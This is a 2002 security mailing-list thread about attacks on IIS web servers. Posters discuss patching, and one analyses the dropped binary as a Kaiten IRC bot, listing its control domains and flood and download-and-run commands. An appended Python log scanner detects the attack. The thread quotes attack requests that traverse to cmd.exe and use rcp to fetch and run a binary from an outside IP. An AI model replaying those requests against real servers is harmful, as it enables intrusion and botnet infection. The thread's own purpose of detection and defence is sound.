Security Incidents mailing list archives
RE: new IIS worm? (rcp lsass.exe)
From: "David LeBlanc" <dleblanc () microsoft com>
Date: Thu, 26 Sep 2002 13:24:09 -0700
If you want something that automatically installs only patches you approve, take a look at http://www.microsoft.com/windows2000/windowsupdate/sus/default.asp It might help you in your environment.
-----Original Message-----
From: zeno [mailto:bugtraq () cgisecurity net]
Sent: Tuesday, September 24, 2002 2:08 PM
To: John Campbell
Cc: incidents () securityfocus com
Subject: Re: new IIS worm? (rcp lsass.exe)

Windows Update from you-know-who actually does what you describe. I'd always been leery of it, but tried it out recently when setting up a W2K test server, and it performed as advertised. It did take several iterations to get everything updated, owing to various dependencies.

When I used windows update it downloaded the patches but didn't install them. I had to manually go through each one. While this isn't a big deal I am looking for something 100 percent automated with install of the patches. Perhaps I'm missing something; I deal mostly with unix.

- zeno

Regards,
John Campbell, CISSP, GCWN
Information Security Engineer
Washington School Information Processing Cooperative (WSIPC)
Everett, Washington, USA

-----Original Message-----
From: zeno [mailto:bugtraq () cgisecurity net]
Sent: Tuesday, September 24, 2002 11:29 AM
To: Mark Challender
Cc: 'pj () esec dk'; incidents () securityfocus com
Subject: Re: new IIS worm? (rcp lsass.exe)

Hardening of IIS with the tools available at Microsoft and using URLSCAN with the EXE blocking on will stop these attacks. Patch, patch, patch, recheck the patches and use URLSCAN!

Does anyone know of a gui windows tool that scans your system and provides you with a list of needed patches, and then allows you to select, and have it autodownload and install them? I can't seem to find one (needed mostly for iis).

- zeno () cgisecurity com

Mark Challender
Network Administrator
==================
Veni, Vidi, Geeki
==================

-----Original Message-----
From: pj () esec dk [mailto:pj () esec dk]
Sent: Monday, September 23, 2002 3:27 AM
To: incidents () securityfocus com
Subject: Re: new IIS worm? (rcp lsass.exe)

Christian Mock:

Then it seems to go after the web servers, sending the following:

GET /scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+rcp+-b+64.21.95.7.lp:lsass.exe+. HTTP/1.0

and

GET /scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+lsass.exe HTTP/1.0

I've been able to get hold of that lsass.exe binary (9728 bytes), but I lack the skills to analyze it; I'll happily mail it to anybody who asks.

We have seen this attack from 4 different sources since Sept. 16, and have informed the owner of 64.21.95.7 and downloaded the lsass.exe for investigation. Based on the attack rate this is most likely a scripted or manual attack, not a worm.

Judging from the embedded string in this compressed binary it appears to be an IRC bot based on the kaiten.c code written by contem@efnet, the author of the Slapper worm:

Kaiten Win32 API version 2002 by contem@efnet

The binary contains these domain names, most likely IRC servers used for controlling the bot:

telsa5.mine.nu (Korea)
irc.logicfive.net (Taiwan)
moncredo.shacknet.nu (USA)
telsacredo.shacknet.nu (USA)
lar.ath.cx (Taiwan)

The program accepts commands to make various DOS attacks or download new versions or executables with http:

NOTICE %s :PUSH <target> <port> <secs> = A push flooder
NOTICE %s :TCP <target> <port> <secs> = A syn flooder
NOTICE %s :UDP <target> <port> <secs> = A udp flooder
NOTICE %s :MCON <target> <port> <times> = A connectbomb flooder
NOTICE %s :NICK <nick> = Changes the nick of the client
NOTICE %s :DISABLE <pass> = Disables all packeting from this client
NOTICE %s :ENABLE <pass> = Enables all packeting from this client
NOTICE %s :UPDATE <http address> = Downloads a file off the web and updates the client
NOTICE %s :RUN <http address> = Downloads a file off the web and runs it
NOTICE %s :GET <http address> = Downloads a file off the web
NOTICE %s :ADDSERVER <server> = Adds a server to the list
NOTICE %s :DELSERVER <server> = Deletes a server from the list
NOTICE %s :LISTSERVERS = Lists servers on the list
NOTICE %s :KILL = Kills the client
NOTICE %s :VERSION = Requests version of client
NOTICE %s :HELP = Displays this

There seems also to be a default account and password in the German language included in this specific version of Kaiten.

The IIS attack that tries to inject this Trojan usually has another URL with "CONNECT chat.vtm.be:6667". This is an attempt to proxy a connection to port 6667 (IRC) on chat.vtm.be.

Peter Jelver
...
eSec A/S
http://www.esec.dk
............................................................................
PGP Fingerprint : 47AF FFEC D48F 9C13 0C4F E687 BB8A 128F D85C A7D7

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
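The two cmd.exe requests and the CONNECT attempt quoted in the thread are exactly what shows up in a web server log, and a log sweep for them is the quickest way to check whether a box was hit before URLScan or the patches went on. The Python below is an added example, not code from the original thread or from any of its posters. It percent-decodes each request until the result is stable (so the double-encoded `%255c` variant, which is not in the post and is assumed here as a common evasion, is caught alongside `%5c`), folds backslashes to forward slashes, and then flags directory traversal, a cmd.exe invocation, an rcp/tftp fetch in the query string, and the CONNECT verb. The log format (source IP plus the quoted request line) and the IP addresses are constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed sample log (source IP plus the request line); not from the original post.
# The first three requests mirror the ones quoted in the thread; the last two are a
# benign request and a double-encoded (%255c) variant added for the example.
SAMPLE_LOG = """\
192.0.2.10 "GET /scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+rcp+-b+64.21.95.7.lp:lsass.exe+. HTTP/1.0"
192.0.2.10 "GET /scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+lsass.exe HTTP/1.0"
192.0.2.10 "CONNECT chat.vtm.be:6667 HTTP/1.0"
192.0.2.20 "GET /default.htm HTTP/1.0"
192.0.2.30 "GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir HTTP/1.0"
"""

LOG_LINE = re.compile(r'^(\S+) "([^"]*)"$')
# A ".." path segment once the URL has been decoded and backslashes folded.
TRAVERSAL = re.compile(r"(?:^|/)\.\.(?:/|$)")
# Tools the bot dropper used (rcp, per the thread) or commonly uses to pull a binary.
FETCH_TOOLS = ("rcp", "tftp")


def normalize(text: str) -> str:
    """Percent-decode until stable (catches %5c as well as double-encoded %255c),
    then fold backslashes to '/' and lower-case, so the path compares the way
    the file system will actually resolve it."""
    prev = None
    cur = text
    while cur != prev:
        prev, cur = cur, unquote(cur)
    return cur.replace("\\", "/").lower()


def classify(request_line: str) -> list:
    """Return the indicators found in one HTTP request line (empty list if benign)."""
    parts = request_line.split(" ")
    if len(parts) < 2:
        return []
    method, target = parts[0].upper(), parts[1]
    if method == "CONNECT":
        # The server is being asked to proxy a raw TCP connection (IRC in the thread).
        return ["connect-proxy"]
    findings = []
    path, _, query = target.partition("?")
    npath = normalize(path)
    # '+' is a space in the cmd.exe argument string; fold it so word boundaries work.
    nquery = normalize(query).replace("+", " ")
    if TRAVERSAL.search(npath):
        findings.append("traversal")
    if "cmd.exe" in npath:
        findings.append("cmd.exe")
    for tool in FETCH_TOOLS:
        if re.search(rf"\b{tool}\b", nquery):
            findings.append(f"{tool}-fetch")
    return findings


def scan(log_text: str) -> list:
    """Run classify() over every log line and return the flagged ones."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        src, request = m.groups()
        findings = classify(request)
        if findings:
            hits.append({"src": src, "request": request, "findings": findings})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["src"], hit["findings"], hit["request"])
```

On a real IIS W3C log the stem and query are separate fields (cs-uri-stem, cs-uri-query), still percent-encoded as received, so feed them to normalize() separately rather than reassembling a request line. A hit on "traversal" plus "cmd.exe" with a 200 status is the thing to chase: it means the decode bug was present and the command ran, and the host should then be checked for the dropped lsass.exe and outbound connections to port 6667.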
Current thread:
- Re: new IIS worm? (rcp lsass.exe), (continued)
- Re: new IIS worm? (rcp lsass.exe) Nick FitzGerald (Sep 25)
- Re: new IIS worm? (rcp lsass.exe) Faisal Ashraf (Sep 26)
- Re: new IIS worm? (rcp lsass.exe) Christoph Puppe (Sep 25)
- Re: new IIS worm? (rcp lsass.exe) Nick FitzGerald (Sep 25)
- Re: new IIS worm? (rcp lsass.exe) zeno (Sep 24)
- RE: new IIS worm? (rcp lsass.exe) John Campbell (Sep 24)
- RE: new IIS worm? (rcp lsass.exe) Dostie, Joe (Sep 25)
- RE: new IIS worm? (rcp lsass.exe) webbi (Sep 25)
- RE: new IIS worm? (rcp lsass.exe) John Campbell (Sep 25)
- Re: new IIS worm? (rcp lsass.exe) zeno (Sep 25)
- RE: new IIS worm? (rcp lsass.exe) Gaydosh, Adam (Sep 25)
- RE: new IIS worm? (rcp lsass.exe) David LeBlanc (Sep 26)
- RE: new IIS worm? (rcp lsass.exe) Dallas Jordan (Sep 26)
- RE: new IIS worm? (rcp lsass.exe) Bax . Plemons (Sep 26)
- Re: new IIS worm? (rcp lsass.exe) Muhammad Faisal Rauf Danka (Sep 27)